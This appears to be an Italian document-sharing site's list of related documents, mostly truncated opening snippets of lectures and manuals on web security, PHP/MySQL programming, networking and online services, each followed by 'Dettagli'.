Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

La rete è una componente fondamentale della

La rete è una componente fondamentale della automazioneoggi Attenti alle reti La telematica si basa prevalentemente sulle reti come mezzo di comunicazione per cui è indispensabile adottare strategie di sicurezza per difendere i sistemi di supervisione

Dettagli

SMS-Bulk Gateway interfaccia HTTP

SMS-Bulk Gateway interfaccia HTTP SMS-Bulk Gateway interfaccia HTTP Versione 2.3.1 2001-2014 SmsItaly.Com 1 1 Introduzione 1.1 Sommario Solo gli utenti autorizzati hanno accesso al nostro SMS Gateway e possono trasmettere messaggi SMS

Dettagli

Nozioni di base sull utilizzo di PHP e di MySQL

Nozioni di base sull utilizzo di PHP e di MySQL Nozioni di base sull utilizzo di PHP e di MySQL Che cos è PHP? Mi sento in dovere prima di iniziare ad illustrare le nozioni di base di PHP introdurre dicendo PHP che cos è in sostanza; fino a qualche

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

LBSEC. http://www.liveboxcloud.com

LBSEC. http://www.liveboxcloud.com 2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità

Dettagli

Dato un form contenente

Dato un form contenente <input type=text name=weight size=20 /> Dato un form contenente Lo script PHP inserisce l input dell utente in una variabile speciale chiamata $_REQUEST['weight']il cui argomento è uguale al corrispondente

Dettagli

Applicazione ASP di esempio

Applicazione ASP di esempio Applicazione ASP di esempio Database in rete Prof. Claudio Maccherani Un server web è un programma che gira su un computer sempre collegato ad Internet e che mette a disposizione file, pagine e servizi.

Dettagli

Uso sicuro del web Navigare in siti sicuri

Uso sicuro del web Navigare in siti sicuri Uso sicuro del web Navigare in siti sicuri La rete internet, inizialmente, era concepita come strumento di ricerca di informazioni. L utente esercitava un ruolo passivo. Non interagiva con le pagine web

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2012/2013 Sicurezza delle applicazioni web: attacchi web Srdjan Matic, Aristide Fattori 31 Maggio 2013

Dettagli

Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web. Problemi di sicurezza nello sviluppo di applicazioni web

Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web. Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Problemi di sicurezza nello sviluppo di applicazioni web. Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web

Problemi di sicurezza nello sviluppo di applicazioni web. Quale è lo stato della sicurezza? Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit.

Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit. Security by design Come la gestione di un progetto può minimizzare i rischi per il business Alessio L.R. Pennasilico - apennasilico@clusit.it 22 Febbraio 2013 - Milano Alessio L.R. Pennasilico Security

Dettagli

CONCETTI DI SICUREZZA IN PHP

CONCETTI DI SICUREZZA IN PHP UNIVERSITA DEGLI STUDI DI FIRENZE FACOLTA DI INGEGNERIA INFORMATICA Seminario CONCETTI DI SICUREZZA IN PHP Dott. Ing. Stefano Di Paola Concetti di Sicurezza in Php e Mysql p.1/57 Sicurezza - Concetti Generali

Dettagli

PHP + MySQL. Programmazione lato server. Cosa vediamo. MySQL. MySQL: comandi utili. MySQL: accesso al server. web server.

PHP + MySQL. Programmazione lato server. Cosa vediamo. MySQL. MySQL: comandi utili. MySQL: accesso al server. web server. Cosa vediamo web server Programmazione lato server PHP + MySQL request response web client database server Cosa vediamo MySQL browser Apache PHP engine MySQL server MySQL is a very fast, robust, relational

Dettagli

Elementi di Sicurezza e Privatezza Lezione 12 Web Security

Elementi di Sicurezza e Privatezza Lezione 12 Web Security Elementi di Sicurezza e Privatezza Lezione 12 Web Security Chiara Braghin chiara.braghin@unimi.it Dalla lezione precedente Formato della HTTP Request: Metodo URL Versione protocollo Header GET /index.html

Dettagli

Problemi di sicurezza nello sviluppo di applicazioni web

Problemi di sicurezza nello sviluppo di applicazioni web Problemi di sicurezza nello sviluppo di applicazioni web Antonio Lioy < lioy @ polito.it > Politecnico di Torino Dip. Automatica e Informatica Quale è lo stato della sicurezza? milioni di euro e milioni

Dettagli

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com

$whois. Introduzione Attacco a una webapp Attacco a un sistema Conclusioni. http://voidsec.com voidsec@voidsec.com $whois Paolo Stagno Luca Poletti http://voidsec.com voidsec@voidsec.com Nell anno 2013: Aumento del 30% degli attacchi a siti e web application 14 zero-day 5,291 nuove vulnerabilità scoperte, 415 di queste

Dettagli

Reti di Calcolatori. Master "Bio Info" Reti e Basi di Dati Lezione 2

Reti di Calcolatori. Master Bio Info Reti e Basi di Dati Lezione 2 Reti di Calcolatori Sommario Software di rete TCP/IP Livello Applicazione Http Livello Trasporto (TCP) Livello Rete (IP, Routing, ICMP) Livello di Collegamento (Data-Link) I Protocolli di comunicazione

Dettagli

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif

Web e HTTP. path name. host name Realizzato da Roberto Savino. www.someschool.edu/somedept/pic.gif Web e HTTP Terminologia Una pagina web consiste di oggetti Un oggetto può essere un file HTML, una immagine JPG, ecc. Una pagina web consiste di un file HTML base che fa riferimento a diversi oggetti al

Dettagli

Reti di calcolatori. Lezione del 25 giugno 2004

Reti di calcolatori. Lezione del 25 giugno 2004 Reti di calcolatori Lezione del 25 giugno 2004 Tecniche di attacco Denial of Service : impedisce ad una organizzazione di usare i servizi della propria rete; sabotaggio elettronico Gli attacchi DoS possono

Dettagli

Siti interattivi e dinamici. in poche pagine

Siti interattivi e dinamici. in poche pagine Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata

Dettagli

bool mysql_select_db([string database_name [,resource link_identifier]]) Connessione ad un server MySQL vuole conettere

bool mysql_select_db([string database_name [,resource link_identifier]]) Connessione ad un server MySQL vuole conettere Connessione ad un server MySQL resource mysql_connect ([string server [, string username [, string password [, bool new_link [, int client_flags]]]]]) server nome o indirizzo del server username nome utente

Dettagli

Perchè un database? Perchè un database? Tipi di DataBase. Scegliere un database. ! Sicurezza. ! Evitare la ridondanza. ! Architettura multilivello

Perchè un database? Perchè un database? Tipi di DataBase. Scegliere un database. ! Sicurezza. ! Evitare la ridondanza. ! Architettura multilivello ! Evitare la ridondanza Perchè un database? Avere PHP che assembla le pagine velocemente da un modello ed un DB è un esperienza unica. Con lo sforzo di programmazione di una pagina, si possono produrre

Dettagli

SERVIZIO DI INTERNET BANKING DEL GRUPPO BANCA POPOLARE DI BARI

SERVIZIO DI INTERNET BANKING DEL GRUPPO BANCA POPOLARE DI BARI SERVIZIO DI INTERNET BANKING DEL GRUPPO BANCA POPOLARE DI BARI ISTRUZIONI OPERATIVE PER LA REGISTRAZIONE E L ACCESSO AL SERVIZIO Pag. 1 di 9 PRIMO ACCESSO REGISTRAZIONE AL SERVIZIO Accedere al sito www.agenziabpb.it

Dettagli

Architetture di sistema

Architetture di sistema Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.6 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio

Dettagli

Accesso remoto alle risorse bibliografiche

Accesso remoto alle risorse bibliografiche Accesso remoto alle risorse bibliografiche Procedura di accesso usando la Biblioteca Virtuale Accesso al sito SBA Accedere con il browser alla URL http://host.uniroma3.it/biblioteche/ Selezionare la Biblioteca

Dettagli

Nuvola It Data Space

Nuvola It Data Space MANUALE UTENTE INDICE 1. Descrizione servizio... 3 1.1. Informazioni sul servizio di Telecom Italia... 3 1.2. Ruoli e Autenticazione per il servizio di Telecom Italia... 3 1.3. Strumenti... 5 1.4. Documentazione...

Dettagli

Programmazione Java Avanzata

Programmazione Java Avanzata Programmazione Java Avanzata Accesso ai Dati Ing. Giuseppe D'Aquì Testi Consigliati Eclipse In Action Core J2EE Patterns - DAO [http://java.sun.com/blueprints/corej2eepatterns/patterns/dataaccessobject.html]

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

INFORMATICA DISTRIBUITA. lez 6 World Wide Web (cont)

INFORMATICA DISTRIBUITA. lez 6 World Wide Web (cont) INFORMATICA DISTRIBUITA prof. lez 6 World Wide Web (cont) Università degli Studi di Milano Scienze e Tecnologie della Comunicazione Musicale a.a. 2009-2010 Scripting Invece di avere un programma esterno,

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

Sicurezza delle reti. Monga. L autenticazione in rete Password Altre credenziali OTP Metodi crittografici. Pericoli. Sicurezza delle reti.

Sicurezza delle reti. Monga. L autenticazione in rete Password Altre credenziali OTP Metodi crittografici. Pericoli. Sicurezza delle reti. 1 Mattia Lezione XIX: Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi allo stesso modo

Dettagli

ASSOCIAZIONE ITALIANA EDITORI

ASSOCIAZIONE ITALIANA EDITORI ASSOCIAZIONE ITALIANA EDITORI APPLICAZIONE WEB CONSULTAZIONE CATALOGO LIBRI DI TESTO DESTINATO AI DOCENTI MANUALE UTENTE v. 1.0-08/04/2010 INDICE 1 INTRODUZIONE...3 2 RICHIESTA DI ABILITAZIONE ALL USO...3

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

Operation Bloodninja. Phishing Campaign Analysis Report

Operation Bloodninja. Phishing Campaign Analysis Report Operation Bloodninja Phishing Campaign Analysis Report Sommario Executive Summary... 1 Technical Analysis... 2 Attack Flow... 2 Components Analysis... 4 login_a.php... 4 css.php... 5 wp- config.php...

Dettagli

Remote SQL Command Execution

Remote SQL Command Execution Remote SQL Command Execution Spesso si ha a che fare con SQL Injection se ci si trova nel campo della sicurezza informatica, ma non sempre si è a conoscenza di quanto una vulnerabilità del genere può essere

Dettagli

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Pag. 1/1 Sessione ordinaria 2010 Seconda prova scritta Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE CORSO DI ORDINAMENTO Indirizzo: INFORMATICA

Dettagli

PHP. A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas. Copyright Istituto Italiano Edizioni Atlas

PHP. A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas. Copyright Istituto Italiano Edizioni Atlas PHP A. Lorenzi, R. Giupponi, D. Iovino LINGUAGGI WEB. LATO SERVER E MOBILE COMPUTING Atlas Copyright Istituto Italiano Edizioni Atlas Programmazione lato server PHP è un linguaggio che estende le funzionalità

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

Consulenza Informatica ======================================================================= Introduzione. Documentazione tecnica

Consulenza Informatica ======================================================================= Introduzione. Documentazione tecnica Introduzione Le novità che sono state introdotte nei terminal services di Windows Server 2008 sono davvero tante ed interessanti, sotto tutti i punti di vista. Chi già utilizza i Terminal Services di Windows

Dettagli

FileMaker 12. Guida di Pubblicazione Web Immediata

FileMaker 12. Guida di Pubblicazione Web Immediata FileMaker 12 Guida di Pubblicazione Web Immediata 2004 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi

Dettagli

intranet solutions www.goinfoteam.it THE INTEGRATION OF INFORMATION, DESIGN AND TECHNOLOGY

intranet solutions www.goinfoteam.it THE INTEGRATION OF INFORMATION, DESIGN AND TECHNOLOGY solutions THE INTEGRATION OF INFORMATION, DESIGN AND TECHNOLOGY www.goinfoteam.it Lo scopo del progetto è quello di dotare l azienda di una piattaforma di collaborazione che sia flessibile e personalizzabile.

Dettagli

Sommario Impostazioni generali del BROWSER... 2 Procedura di registrazione... 9 Primo Accesso... 13 Accesso al Portale... 18

Sommario Impostazioni generali del BROWSER... 2 Procedura di registrazione... 9 Primo Accesso... 13 Accesso al Portale... 18 Sommario Impostazioni generali del BROWSER... 2 Procedura di registrazione... 9 Primo Accesso... 13 Accesso al Portale... 18 Impostazioni generali del BROWSER La seguente impostazione del Browser (nell

Dettagli

APPENDICE B Le Active Server Page

APPENDICE B Le Active Server Page APPENDICE B Le Active Server Page B.1 Introduzione ad ASP La programmazione web è nata con la Common Gateway Interface. L interfaccia CGI tuttavia presenta dei limiti: ad esempio anche per semplici elaborazioni

Dettagli

Bibliografia: Utenti e sessioni

Bibliografia: Utenti e sessioni Bibliografia: Utenti e sessioni http: protocollo stateless http si appoggia su una connessione tcp e lo scambio nel contesto di una connessione si limita a invio della richiesta, ricezione della risposta.

Dettagli

RELAZIONE RELATIVA ALLA GESTIONE DEL SITO DI E-COMMERCE

RELAZIONE RELATIVA ALLA GESTIONE DEL SITO DI E-COMMERCE Gabriele Fiorani 5^D Mercurio 2012/2013 RELAZIONE RELATIVA ALLA GESTIONE DEL SITO DI E-COMMERCE TRACCIA DEL PROBLEMA Realizzare un sito di tipo e-commerce che consenta di gestire l intera procedura informatica

Dettagli